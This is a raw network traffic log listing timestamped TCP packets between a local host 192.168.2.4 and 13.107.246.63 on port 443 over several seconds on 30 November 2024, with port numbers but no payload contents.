Nov 30, 2024 12:48:46.722616911 CET	49858	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:46.722642899 CET	443	49858	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:46.722990990 CET	49858	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:46.722995996 CET	443	49858	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:46.782162905 CET	443	49859	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:46.782526016 CET	49859	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:46.782546043 CET	443	49859	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:46.782922983 CET	49859	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:46.782933950 CET	443	49859	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:46.849719048 CET	443	49860	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:46.850435019 CET	49860	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:46.850455046 CET	443	49860	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:46.850827932 CET	49860	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:46.850832939 CET	443	49860	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:46.857117891 CET	443	49861	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:46.858464003 CET	49861	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:46.858486891 CET	443	49861	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:46.858859062 CET	49861	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:46.858864069 CET	443	49861	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.134473085 CET	443	49857	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.138521910 CET	443	49857	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.138592958 CET	49857	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.138642073 CET	49857	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.138685942 CET	443	49857	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.138716936 CET	49857	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.138732910 CET	443	49857	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.141355038 CET	49862	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.141379118 CET	443	49862	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.141438007 CET	49862	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.141562939 CET	49862	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.141576052 CET	443	49862	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.166868925 CET	443	49858	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.169997931 CET	443	49858	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.170056105 CET	49858	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.170083046 CET	49858	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.170095921 CET	443	49858	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.170105934 CET	49858	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.170110941 CET	443	49858	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.172313929 CET	49863	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.172333956 CET	443	49863	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.172404051 CET	49863	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.172540903 CET	49863	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.172554016 CET	443	49863	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.230906010 CET	443	49859	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.230926991 CET	443	49859	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.230952024 CET	443	49859	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.231010914 CET	49859	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.231049061 CET	49859	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.231231928 CET	49859	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.231254101 CET	443	49859	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.231276989 CET	49859	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.231287003 CET	443	49859	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.233751059 CET	49864	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.233791113 CET	443	49864	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.233869076 CET	49864	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.234002113 CET	49864	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.234014988 CET	443	49864	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.301145077 CET	443	49861	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.303339005 CET	443	49860	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.304501057 CET	443	49861	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.304533958 CET	443	49861	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.304557085 CET	49861	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.304610014 CET	49861	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.304687977 CET	49861	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.304693937 CET	443	49861	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.304728985 CET	49861	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.304733038 CET	443	49861	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.306744099 CET	49865	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.306770086 CET	443	49865	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.306838989 CET	49865	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.306969881 CET	49865	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.306982994 CET	443	49865	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.307214975 CET	443	49860	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.307262897 CET	49860	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.307306051 CET	49860	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.307317019 CET	443	49860	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.307332039 CET	49860	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.307336092 CET	443	49860	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.309253931 CET	49866	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.309267044 CET	443	49866	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:47.309357882 CET	49866	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.309472084 CET	49866	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:47.309482098 CET	443	49866	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:48.859441042 CET	443	49862	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:48.860104084 CET	49862	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:48.860136032 CET	443	49862	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:48.860536098 CET	49862	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:48.860542059 CET	443	49862	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:48.992436886 CET	443	49863	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:48.992909908 CET	49863	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:48.992932081 CET	443	49863	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:48.993374109 CET	49863	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:48.993379116 CET	443	49863	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.033133984 CET	443	49864	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.033430099 CET	49864	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.033451080 CET	443	49864	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.033768892 CET	49864	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.033775091 CET	443	49864	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.090610027 CET	443	49865	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.091085911 CET	49865	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.091108084 CET	443	49865	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.091459990 CET	49865	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.091464996 CET	443	49865	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.113617897 CET	443	49866	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.113953114 CET	49866	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.113965034 CET	443	49866	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.114314079 CET	49866	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.114317894 CET	443	49866	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.295511961 CET	443	49862	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.299022913 CET	443	49862	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.299099922 CET	49862	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.299138069 CET	49862	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.299154043 CET	443	49862	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.299170017 CET	49862	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.299175024 CET	443	49862	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.301759005 CET	49867	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.301785946 CET	443	49867	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.301873922 CET	49867	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.301999092 CET	49867	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.302011967 CET	443	49867	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.436121941 CET	443	49863	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.439634085 CET	443	49863	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.439691067 CET	49863	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.439810991 CET	49863	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.439821005 CET	443	49863	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.439843893 CET	49863	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.439846992 CET	443	49863	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.442761898 CET	49868	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.442794085 CET	443	49868	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.442853928 CET	49868	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.442976952 CET	49868	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.442990065 CET	443	49868	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.477528095 CET	443	49864	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.480896950 CET	443	49864	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.480952024 CET	49864	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.480978966 CET	49864	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.480993986 CET	443	49864	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.481004000 CET	49864	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.481009007 CET	443	49864	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.482791901 CET	49869	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.482825041 CET	443	49869	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.482882977 CET	49869	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.482984066 CET	49869	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.482996941 CET	443	49869	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.535051107 CET	443	49865	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.535113096 CET	443	49865	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.535144091 CET	443	49865	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.535159111 CET	49865	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.535187960 CET	49865	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.535283089 CET	49865	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.535293102 CET	443	49865	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.535301924 CET	49865	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.535305977 CET	443	49865	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.537130117 CET	49870	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.537144899 CET	443	49870	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.537210941 CET	49870	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.537344933 CET	49870	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.537355900 CET	443	49870	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.557862043 CET	443	49866	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.560800076 CET	443	49866	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.560877085 CET	49866	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.560928106 CET	49866	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.560933113 CET	443	49866	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.560966015 CET	49866	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.560970068 CET	443	49866	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.566385031 CET	49871	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.566396952 CET	443	49871	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:49.566472054 CET	49871	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.566590071 CET	49871	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:49.566601992 CET	443	49871	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.081681967 CET	443	49867	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.082309008 CET	49867	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.082324028 CET	443	49867	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.082783937 CET	49867	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.082788944 CET	443	49867	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.262551069 CET	443	49869	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.262944937 CET	49869	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.262964964 CET	443	49869	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.263459921 CET	49869	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.263465881 CET	443	49869	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.290218115 CET	443	49868	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.292212009 CET	49868	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.292243004 CET	443	49868	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.292623043 CET	49868	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.292634010 CET	443	49868	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.323175907 CET	443	49870	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.326524019 CET	49870	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.326533079 CET	443	49870	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.326888084 CET	49870	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.326894045 CET	443	49870	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.351155996 CET	443	49871	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.351550102 CET	49871	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.351564884 CET	443	49871	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.351958036 CET	49871	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.351963043 CET	443	49871	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.526591063 CET	443	49867	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.529786110 CET	443	49867	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.532177925 CET	49867	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.532202959 CET	49867	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.532217979 CET	443	49867	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.532227039 CET	49867	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.532229900 CET	443	49867	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.535047054 CET	49872	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.535059929 CET	443	49872	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.535160065 CET	49872	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.535296917 CET	49872	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.535309076 CET	443	49872	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.706016064 CET	443	49869	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.709873915 CET	443	49869	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.709907055 CET	443	49869	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.709938049 CET	49869	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.709976912 CET	49869	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.710022926 CET	49869	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.710032940 CET	443	49869	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.710043907 CET	49869	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.710050106 CET	443	49869	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.712724924 CET	49873	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.712763071 CET	443	49873	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.712826014 CET	49873	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.712954998 CET	49873	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.712966919 CET	443	49873	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.743340015 CET	443	49868	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.746822119 CET	443	49868	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.746879101 CET	49868	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.746911049 CET	49868	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.746926069 CET	443	49868	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.746936083 CET	49868	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.746939898 CET	443	49868	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.748961926 CET	49874	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.748974085 CET	443	49874	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.749044895 CET	49874	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.749186039 CET	49874	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.749196053 CET	443	49874	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.767730951 CET	443	49870	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.770937920 CET	443	49870	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.770998001 CET	49870	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.771035910 CET	49870	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.771040916 CET	443	49870	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.771053076 CET	49870	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.771055937 CET	443	49870	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.772994041 CET	49875	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.773005009 CET	443	49875	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.773068905 CET	49875	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.773170948 CET	49875	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.773180962 CET	443	49875	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.794800043 CET	443	49871	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.798825026 CET	443	49871	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.798878908 CET	49871	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.798923016 CET	49871	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.798928022 CET	443	49871	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.798935890 CET	49871	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.798938990 CET	443	49871	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.800898075 CET	49876	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.800911903 CET	443	49876	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:51.800976992 CET	49876	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.801120043 CET	49876	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:51.801132917 CET	443	49876	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.250047922 CET	443	49872	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.252268076 CET	49872	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.252290964 CET	443	49872	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.252671957 CET	49872	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.252676964 CET	443	49872	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.492860079 CET	443	49875	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.494158030 CET	443	49873	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.494673014 CET	49873	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.494673014 CET	49875	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.494687080 CET	443	49873	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.494703054 CET	443	49875	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.495124102 CET	49873	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.495129108 CET	443	49873	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.495187998 CET	49875	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.495193005 CET	443	49875	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.594198942 CET	443	49874	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.596466064 CET	49874	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.596482992 CET	443	49874	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.596826077 CET	49874	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.596829891 CET	443	49874	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.602487087 CET	443	49876	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.604401112 CET	49876	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.604413986 CET	443	49876	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.604768038 CET	49876	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.604773045 CET	443	49876	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.686002970 CET	443	49872	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.689073086 CET	443	49872	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.690920115 CET	49872	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.690952063 CET	49872	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.690963984 CET	443	49872	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.690974951 CET	49872	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.690979004 CET	443	49872	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.693579912 CET	49877	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.693615913 CET	443	49877	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.693669081 CET	49877	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.693823099 CET	49877	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.693834066 CET	443	49877	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.927419901 CET	443	49875	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.930906057 CET	443	49875	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.930993080 CET	49875	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.931046963 CET	49875	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.931062937 CET	443	49875	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.931072950 CET	49875	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.931077957 CET	443	49875	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.933774948 CET	49878	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.933803082 CET	443	49878	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.933875084 CET	49878	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.934009075 CET	49878	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.934022903 CET	443	49878	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.937311888 CET	443	49873	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.941622972 CET	443	49873	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.941670895 CET	443	49873	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.941673994 CET	49873	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.941715002 CET	49873	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.941757917 CET	49873	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.941761971 CET	443	49873	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.941770077 CET	49873	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.941772938 CET	443	49873	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.943702936 CET	49879	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.943725109 CET	443	49879	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:53.943783998 CET	49879	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.943916082 CET	49879	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:53.943929911 CET	443	49879	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:54.047339916 CET	443	49876	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:54.047403097 CET	443	49876	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:54.047460079 CET	49876	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:54.047580957 CET	49876	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:54.047590017 CET	443	49876	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:54.047597885 CET	49876	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:54.047601938 CET	443	49876	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:54.047746897 CET	443	49874	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:54.049824953 CET	49880	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:54.049913883 CET	443	49880	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:54.050012112 CET	49880	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:54.050133944 CET	49880	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:54.050163984 CET	443	49880	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:54.050909042 CET	443	49874	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:54.050960064 CET	49874	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:54.051033974 CET	49874	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:54.051033974 CET	49874	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:54.051039934 CET	443	49874	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:54.051047087 CET	443	49874	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:54.057029009 CET	49881	443	192.168.2.4	13.107.246.63
